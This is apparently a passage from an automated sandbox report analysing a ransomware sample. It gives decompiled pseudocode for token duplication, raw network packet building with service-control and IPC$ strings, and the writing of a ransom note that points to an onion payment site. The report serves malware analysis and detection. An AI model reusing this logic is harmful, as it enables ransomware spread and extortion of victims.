                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04E2943A), ref: 04E25255
                                                                                                                                                              • sprintf.MSVCRT ref: 04E252AB
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 04E25308
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2530B
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04E2943A), ref: 04E25316
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04E2943A), ref: 04E25319
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 04E25324
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E25327
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Alloc$Free$rand$htonssprintf$recvsend
                                                                                                                                                              • String ID: IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                                                                                                                                              • API String ID: 1576125627-3210642070
                                                                                                                                                              • Opcode ID: 7922b056e6d41e44fd523ee61108cdb6b685b31ec5322d44118988b7e4d6ba1b
                                                                                                                                                              • Instruction ID: 5e1c73e6c8f57bb8ae4b8532602addb9610d843a3950739e4b582aaf4aebca51
                                                                                                                                                              • Opcode Fuzzy Hash: 7922b056e6d41e44fd523ee61108cdb6b685b31ec5322d44118988b7e4d6ba1b
                                                                                                                                                              • Instruction Fuzzy Hash: 66518D72900219BBEF119FA4DE44FEF7BA9EF49308F045045FA40A7191DBB5EA15CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E04E285FB(void* __eflags, long _a4, void _a8, void* _a12, long _a16, void _a20, int _a24, intOrPtr _a36, void* _a88, char _a92, long _a96, char _a648, int _a656, void _a660) {
                                                                                                                                                              				void* _v0;
                                                                                                                                                              				void* _v4;
                                                                                                                                                              				void _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				void* _t62;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				signed int _t85;
                                                                                                                                                              				signed int _t89;
                                                                                                                                                              				intOrPtr _t103;
                                                                                                                                                              				signed int _t107;
                                                                                                                                                              				void* _t109;
                                                                                                                                                              
                                                                                                                                                              				E04E2A760(0x1294);
                                                                                                                                                              				_a8 = 0;
                                                                                                                                                              				_a24 = 0;
                                                                                                                                                              				_a656 = 0;
                                                                                                                                                              				memset( &_a660, 0, 0xffc);
                                                                                                                                                              				_t109 = (_t107 & 0xfffffff8) + 0xc;
                                                                                                                                                              				_v0 = 0;
                                                                                                                                                              				_a36 = E04E28147();
                                                                                                                                                              				_t62 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                              				_a16 = _t62;
                                                                                                                                                              				if(_t62 == 0xffffffff) {
                                                                                                                                                              					L21:
                                                                                                                                                              					return _a4;
                                                                                                                                                              				}
                                                                                                                                                              				_push( &_a92);
                                                                                                                                                              				_a92 = 0x22c;
                                                                                                                                                              				if(Process32FirstW(_t62) == 0) {
                                                                                                                                                              					GetLastError();
                                                                                                                                                              					L20:
                                                                                                                                                              					CloseHandle(_a12);
                                                                                                                                                              					goto L21;
                                                                                                                                                              				}
                                                                                                                                                              				_a24 = _a4 -  &_a648;
                                                                                                                                                              				do {
                                                                                                                                                              					_a8 = _a8 | 0xffffffff;
                                                                                                                                                              					_v4 = 0;
                                                                                                                                                              					_a4 = 0;
                                                                                                                                                              					_t69 = OpenProcess(0x450, 0, _a96);
                                                                                                                                                              					_a20 = _t69;
                                                                                                                                                              					if(_t69 == 0) {
                                                                                                                                                              						L16:
                                                                                                                                                              						if(_v0 >= 0x40) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						goto L17;
                                                                                                                                                              					}
                                                                                                                                                              					if(OpenProcessToken(_t69, 0x2000000,  &_v4) == 0 || GetTokenInformation(_v4, 0xc,  &_a8, 4,  &_a16) == 0 || _a24 != 0 && _a4 == 0 || DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v0) == 0) {
                                                                                                                                                              						L15:
                                                                                                                                                              						CloseHandle(_v4);
                                                                                                                                                              						CloseHandle(_a20);
                                                                                                                                                              						goto L16;
                                                                                                                                                              					} else {
                                                                                                                                                              						memset( &_a20, 0, 0x38);
                                                                                                                                                              						_t109 = _t109 + 0xc;
                                                                                                                                                              						if(GetTokenInformation(_v8, 0xa,  &_a20, 0x38,  &_a4) == 0) {
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              						_t103 = _a24;
                                                                                                                                                              						_t85 = 0;
                                                                                                                                                              						if(_v24 <= 0) {
                                                                                                                                                              							L13:
                                                                                                                                                              							if(SetTokenInformation(_v12, 0xc,  &_v8, 4) != 0) {
                                                                                                                                                              								_t89 = _v28 << 2;
                                                                                                                                                              								_v20 = _v20 + 1;
                                                                                                                                                              								_v28 = _v28 + 1;
                                                                                                                                                              								 *((intOrPtr*)(_t109 + _a4 + _t89 + 0x2a0)) = _v16;
                                                                                                                                                              								 *((intOrPtr*)(_t109 + _t89 + 0x2a0)) = _t103;
                                                                                                                                                              							}
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              						while( *((intOrPtr*)(_t109 + 0x2a0 + _t85 * 4)) != _t103) {
                                                                                                                                                              							_t85 = _t85 + 1;
                                                                                                                                                              							if(_t85 < _v24) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							goto L13;
                                                                                                                                                              						}
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					L17:
                                                                                                                                                              				} while (Process32NextW(_a12,  &_a88) != 0);
                                                                                                                                                              				goto L20;
                                                                                                                                                              			}


















                                                                                                                                                              0x04e28606
                                                                                                                                                              0x04e2861e
                                                                                                                                                              0x04e28622
                                                                                                                                                              0x04e28626
                                                                                                                                                              0x04e2862d
                                                                                                                                                              0x04e28632
                                                                                                                                                              0x04e28635
                                                                                                                                                              0x04e28641
                                                                                                                                                              0x04e28645
                                                                                                                                                              0x04e2864b
                                                                                                                                                              0x04e28652
                                                                                                                                                              0x04e287da
                                                                                                                                                              0x04e287e4
                                                                                                                                                              0x04e287e4
                                                                                                                                                              0x04e2865c
                                                                                                                                                              0x04e2865e
                                                                                                                                                              0x04e2866e
                                                                                                                                                              0x04e287ca
                                                                                                                                                              0x04e287d0
                                                                                                                                                              0x04e287d4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e287d4
                                                                                                                                                              0x04e28680
                                                                                                                                                              0x04e28689
                                                                                                                                                              0x04e2868d
                                                                                                                                                              0x04e28698
                                                                                                                                                              0x04e2869c
                                                                                                                                                              0x04e286a0
                                                                                                                                                              0x04e286a6
                                                                                                                                                              0x04e286ac
                                                                                                                                                              0x04e287aa
                                                                                                                                                              0x04e287af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e287af
                                                                                                                                                              0x04e286c1
                                                                                                                                                              0x04e28798
                                                                                                                                                              0x04e287a2
                                                                                                                                                              0x04e287a8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28716
                                                                                                                                                              0x04e2871e
                                                                                                                                                              0x04e28723
                                                                                                                                                              0x04e2873c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2873e
                                                                                                                                                              0x04e28742
                                                                                                                                                              0x04e28748
                                                                                                                                                              0x04e2875a
                                                                                                                                                              0x04e2876f
                                                                                                                                                              0x04e2877d
                                                                                                                                                              0x04e28782
                                                                                                                                                              0x04e28786
                                                                                                                                                              0x04e2878a
                                                                                                                                                              0x04e28791
                                                                                                                                                              0x04e28791
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2876f
                                                                                                                                                              0x04e2874a
                                                                                                                                                              0x04e28753
                                                                                                                                                              0x04e28758
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28758
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2874a
                                                                                                                                                              0x04e287b1
                                                                                                                                                              0x04e287c0
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 04E2862D
                                                                                                                                                                • Part of subcall function 04E28147: memset.MSVCRT ref: 04E28160
                                                                                                                                                                • Part of subcall function 04E28147: GetVersionExW.KERNEL32(?,?,?,746543E0), ref: 04E28179
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04E28645
                                                                                                                                                              • Process32FirstW.KERNEL32 ref: 04E28666
                                                                                                                                                              • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 04E286A0
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 04E286B9
                                                                                                                                                              • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 04E286DF
                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 04E28708
                                                                                                                                                              • memset.MSVCRT ref: 04E2871E
                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 04E28738
                                                                                                                                                              • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 04E28767
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E287A2
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E287A8
                                                                                                                                                              • Process32NextW.KERNEL32(?,?), ref: 04E287BA
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E287CA
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E287D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 4137997400-2766056989
                                                                                                                                                              • Opcode ID: cd9c28069366348cd95e4c2d430a518ec44aeffd640383813ee298ea1d479314
                                                                                                                                                              • Instruction ID: 8ddd54d79137c8171d7d864a8f3331350ab1fdc007dddd4fd2cd7fa4b9eada46
                                                                                                                                                              • Opcode Fuzzy Hash: cd9c28069366348cd95e4c2d430a518ec44aeffd640383813ee298ea1d479314
                                                                                                                                                              • Instruction Fuzzy Hash: AA512971508311AFD320AF26DD48E6BBBE8FF88755F441A2DF694D21A0D731E905CB52
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E04E23071(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void** _a16, int* _a20) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				signed int _t43;
                                                                                                                                                              				int _t48;
                                                                                                                                                              				int* _t60;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t25 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v12 = _t25;
                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                              					L9:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t40 = HeapAlloc(GetProcessHeap(), 8, 0x3f);
                                                                                                                                                              				if(_t40 == 0) {
                                                                                                                                                              					L8:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              					goto L9;
                                                                                                                                                              				}
                                                                                                                                                              				_t43 = 9;
                                                                                                                                                              				_t31 = memcpy(_t40, _a8, _t43 << 2);
                                                                                                                                                              				__imp__#9(0x3b);
                                                                                                                                                              				 *(_t40 + 2) = _t31;
                                                                                                                                                              				 *((short*)(_t40 + 0x29)) = _a12;
                                                                                                                                                              				 *((char*)(_t40 + 8)) = 0x2e;
                                                                                                                                                              				 *((short*)(_t40 + 0x24)) = 0xff0c;
                                                                                                                                                              				 *((short*)(_t40 + 0x2f)) = 0xfde8;
                                                                                                                                                              				 *((short*)(_t40 + 0x31)) = 0xfde8;
                                                                                                                                                              				 *((short*)(_t40 + 0x37)) = 0xfde8;
                                                                                                                                                              				__imp__#19(_a4, _t40, 0x3f, 0);
                                                                                                                                                              				if(0xfde8 > 0) {
                                                                                                                                                              					__imp__#16(_a4, _v12, 0xffff, 0);
                                                                                                                                                              					_t60 = _a20;
                                                                                                                                                              					 *_t60 = 0xfde8;
                                                                                                                                                              					if(0xfde8 > 0 &&  *((intOrPtr*)(_v12 + 9)) == 0) {
                                                                                                                                                              						_t37 = HeapAlloc(GetProcessHeap(), 8, 0xfde8);
                                                                                                                                                              						 *_a16 = _t37;
                                                                                                                                                              						_t48 =  *_t60;
                                                                                                                                                              						if(_t48 != 0) {
                                                                                                                                                              							memcpy(_t37, _v12, _t48);
                                                                                                                                                              							_v5 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t40);
                                                                                                                                                              				goto L8;
                                                                                                                                                              			}












                                                                                                                                                              0x04e23085
                                                                                                                                                              0x04e23092
                                                                                                                                                              0x04e23094
                                                                                                                                                              0x04e23099
                                                                                                                                                              0x04e23173
                                                                                                                                                              0x04e23179
                                                                                                                                                              0x04e23179
                                                                                                                                                              0x04e230a9
                                                                                                                                                              0x04e230ad
                                                                                                                                                              0x04e23160
                                                                                                                                                              0x04e2316c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e23172
                                                                                                                                                              0x04e230b8
                                                                                                                                                              0x04e230bd
                                                                                                                                                              0x04e230bf
                                                                                                                                                              0x04e230c5
                                                                                                                                                              0x04e230d2
                                                                                                                                                              0x04e230e1
                                                                                                                                                              0x04e230e5
                                                                                                                                                              0x04e230eb
                                                                                                                                                              0x04e230ef
                                                                                                                                                              0x04e230f3
                                                                                                                                                              0x04e230f7
                                                                                                                                                              0x04e230ff
                                                                                                                                                              0x04e2310d
                                                                                                                                                              0x04e23113
                                                                                                                                                              0x04e23116
                                                                                                                                                              0x04e2311a
                                                                                                                                                              0x04e2312e
                                                                                                                                                              0x04e23137
                                                                                                                                                              0x04e23139
                                                                                                                                                              0x04e2313d
                                                                                                                                                              0x04e23144
                                                                                                                                                              0x04e2314c
                                                                                                                                                              0x04e2314c
                                                                                                                                                              0x04e2313d
                                                                                                                                                              0x04e2311a
                                                                                                                                                              0x04e2315a
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,74654F20,00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04E23089
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23092
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000003F,74655520,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E230A4
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E230A7
                                                                                                                                                              • htons.WS2_32(0000003B), ref: 04E230BF
                                                                                                                                                              • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 04E230F7
                                                                                                                                                              • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 04E2310D
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23127
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E2312E
                                                                                                                                                              • memcpy.MSVCRT ref: 04E23144
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23153
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E2315A
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23165
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E2316C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 317911368-3175316637
                                                                                                                                                              • Opcode ID: df625da960170de7bd24df97964fe4d08b538415abad2923447e6ec086d02084
                                                                                                                                                              • Instruction ID: db66de83ec8584d474d86a2bb78d51f3f7b7f5748aba1629b2dc8179b8d7e9ad
                                                                                                                                                              • Opcode Fuzzy Hash: df625da960170de7bd24df97964fe4d08b538415abad2923447e6ec086d02084
                                                                                                                                                              • Instruction Fuzzy Hash: D4319071540305BBEB205FB5DD49F6A7B69FF88305F144159FA04EB285EB7AD800CB24
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E260F9(struct _OVERLAPPED* _a4) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				short _v528;
                                                                                                                                                              				short _v2088;
                                                                                                                                                              				void _v10280;
                                                                                                                                                              				signed int _t35;
                                                                                                                                                              				intOrPtr* _t54;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                              
                                                                                                                                                              				E04E2A760(0x2824);
                                                                                                                                                              				wsprintfW( &_v528, L"%s", L"Readme.txt");
                                                                                                                                                              				_t71 = _a4;
                                                                                                                                                              				if(PathCombineW( &_v2088, _t71 + 4,  &_v528) != 0) {
                                                                                                                                                              					_t35 = E04E26477();
                                                                                                                                                              					if(_t35 != 0) {
                                                                                                                                                              						if(_t35 > 1) {
                                                                                                                                                              							_t35 = _t35 - 1;
                                                                                                                                                              						}
                                                                                                                                                              						if(WaitForMultipleObjects((0 |  *((intOrPtr*)(_t71 + 0x4c)) != 0x00000000) + 1, _t71 + 0x48, 0, _t35 * 0xea60) != 0) {
                                                                                                                                                              							_t63 = CreateFileW( &_v2088, 0x40000000, 0, 0, 1, 0, 0);
                                                                                                                                                              							if(_t63 != 0xffffffff) {
                                                                                                                                                              								_a4 = 0;
                                                                                                                                                              								if(E04E257E5( *((intOrPtr*)(_t71 + 0x38)),  *_t71, _t71 + 0xc,  &_a4) != 0) {
                                                                                                                                                              									memset( &_v10280, 0, 0x1000);
                                                                                                                                                              									StrCatW( &_v10280, L"Oops! Your files have been encrypted.\r\n\r\nIf you see this text, your files are no longer accessible.\r\nYou might have been looking for a way to recover your files.\r\nDon\'t waste your time. No one will be able to recover them without our\r\ndecryption service.\r\n\r\nWe  guarantee that you can recover all your files safely. All you\r\nneed to do is submit the payment and get the decryption password.\r\n\r\nVisit our web service at caforssztxqzf2nm.onion\r\n\r\nYour personal installation key#2:\r\n\r\n");
                                                                                                                                                              									StrCatW( &_v10280, _a4);
                                                                                                                                                              									_t54 =  &_v10280;
                                                                                                                                                              									_v8 = 0;
                                                                                                                                                              									_t65 = _t54 + 2;
                                                                                                                                                              									do {
                                                                                                                                                              										_t67 =  *_t54;
                                                                                                                                                              										_t54 = _t54 + 2;
                                                                                                                                                              									} while (_t67 != 0);
                                                                                                                                                              									if(WriteFile(_t63,  &_v10280, (_t54 - _t65 >> 1) + (_t54 - _t65 >> 1),  &_v8, 0) != 0) {
                                                                                                                                                              										FlushFileBuffers(_t63);
                                                                                                                                                              									}
                                                                                                                                                              									LocalFree(_a4);
                                                                                                                                                              								}
                                                                                                                                                              								CloseHandle(_t63);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return 1;
                                                                                                                                                              			}













                                                                                                                                                              0x04e26101
                                                                                                                                                              0x04e26118
                                                                                                                                                              0x04e2611e
                                                                                                                                                              0x04e2613e
                                                                                                                                                              0x04e26145
                                                                                                                                                              0x04e2614e
                                                                                                                                                              0x04e26157
                                                                                                                                                              0x04e26159
                                                                                                                                                              0x04e26159
                                                                                                                                                              0x04e26178
                                                                                                                                                              0x04e26197
                                                                                                                                                              0x04e2619c
                                                                                                                                                              0x04e261ac
                                                                                                                                                              0x04e261b9
                                                                                                                                                              0x04e261c8
                                                                                                                                                              0x04e261e2
                                                                                                                                                              0x04e261ee
                                                                                                                                                              0x04e261f0
                                                                                                                                                              0x04e261f6
                                                                                                                                                              0x04e261f9
                                                                                                                                                              0x04e261fc
                                                                                                                                                              0x04e261fc
                                                                                                                                                              0x04e261ff
                                                                                                                                                              0x04e26202
                                                                                                                                                              0x04e26223
                                                                                                                                                              0x04e26226
                                                                                                                                                              0x04e26226
                                                                                                                                                              0x04e2622f
                                                                                                                                                              0x04e2622f
                                                                                                                                                              0x04e26236
                                                                                                                                                              0x04e26236
                                                                                                                                                              0x04e2623c
                                                                                                                                                              0x04e26178
                                                                                                                                                              0x04e2623d
                                                                                                                                                              0x04e26243

                                                                                                                                                              APIs
                                                                                                                                                              • wsprintfW.USER32 ref: 04E26118
                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,?), ref: 04E26136
                                                                                                                                                                • Part of subcall function 04E26477: GetTickCount.KERNEL32 ref: 04E26477
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04E26170
                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 04E26191
                                                                                                                                                              • memset.MSVCRT ref: 04E261C8
                                                                                                                                                              • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 04E261E2
                                                                                                                                                              • StrCatW.SHLWAPI(?,?), ref: 04E261EE
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04E2621B
                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 04E26226
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 04E2622F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 04E26236
                                                                                                                                                              Strings
                                                                                                                                                              • Readme.txt, xrefs: 04E26107
                                                                                                                                                              • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 04E261D6
                                                                                                                                                              • pGdv0Hcv, xrefs: 04E261CD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                                                                                                                                              • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt$pGdv0Hcv
                                                                                                                                                              • API String ID: 1343258794-42126597
                                                                                                                                                              • Opcode ID: 2fea317219a5524e87f8ca10ca48f77123263c64a973e8a41d9c00dcd90b0e4e
                                                                                                                                                              • Instruction ID: 37d04af3ad254f371456156f6db60374f1db71d5d95c53e49b3ee32c0ab291f0
                                                                                                                                                              • Opcode Fuzzy Hash: 2fea317219a5524e87f8ca10ca48f77123263c64a973e8a41d9c00dcd90b0e4e
                                                                                                                                                              • Instruction Fuzzy Hash: 1A318F72900218AFDB219B71DE48D9B7BFCEB48705B045665F646D2054EB36FA44CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E04E22F5A(intOrPtr _a4, void* _a8, short _a12, intOrPtr _a16, intOrPtr _a20, short _a24, void* _a28, signed int _a32) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _t36;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				short _t45;
                                                                                                                                                              				signed short _t50;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				signed int _t59;
                                                                                                                                                              				short _t61;
                                                                                                                                                              				void* _t70;
                                                                                                                                                              				void* _t71;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t36 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v16 = _t36;
                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                              					_t38 = _a32 & 0x0000ffff;
                                                                                                                                                              					_v12 = _t38;
                                                                                                                                                              					_t57 = HeapAlloc(GetProcessHeap(), 8, _t38 + 0x40);
                                                                                                                                                              					if(_t57 != 0) {
                                                                                                                                                              						_t59 = 9;
                                                                                                                                                              						memcpy(_t57, _a8, _t59 << 2);
                                                                                                                                                              						_t70 = _v12 + 0x40;
                                                                                                                                                              						_t45 = _t70 - 4;
                                                                                                                                                              						__imp__#9(_t45);
                                                                                                                                                              						 *((short*)(_t57 + 2)) = _t45;
                                                                                                                                                              						 *((short*)(_t57 + 0x29)) = _a12;
                                                                                                                                                              						 *((intOrPtr*)(_t57 + 0x2b)) = _a16;
                                                                                                                                                              						 *((intOrPtr*)(_t57 + 0x2f)) = _a20;
                                                                                                                                                              						 *((short*)(_t57 + 0x33)) = _a24;
                                                                                                                                                              						_t50 = _a32;
                                                                                                                                                              						_t61 = 0x3c;
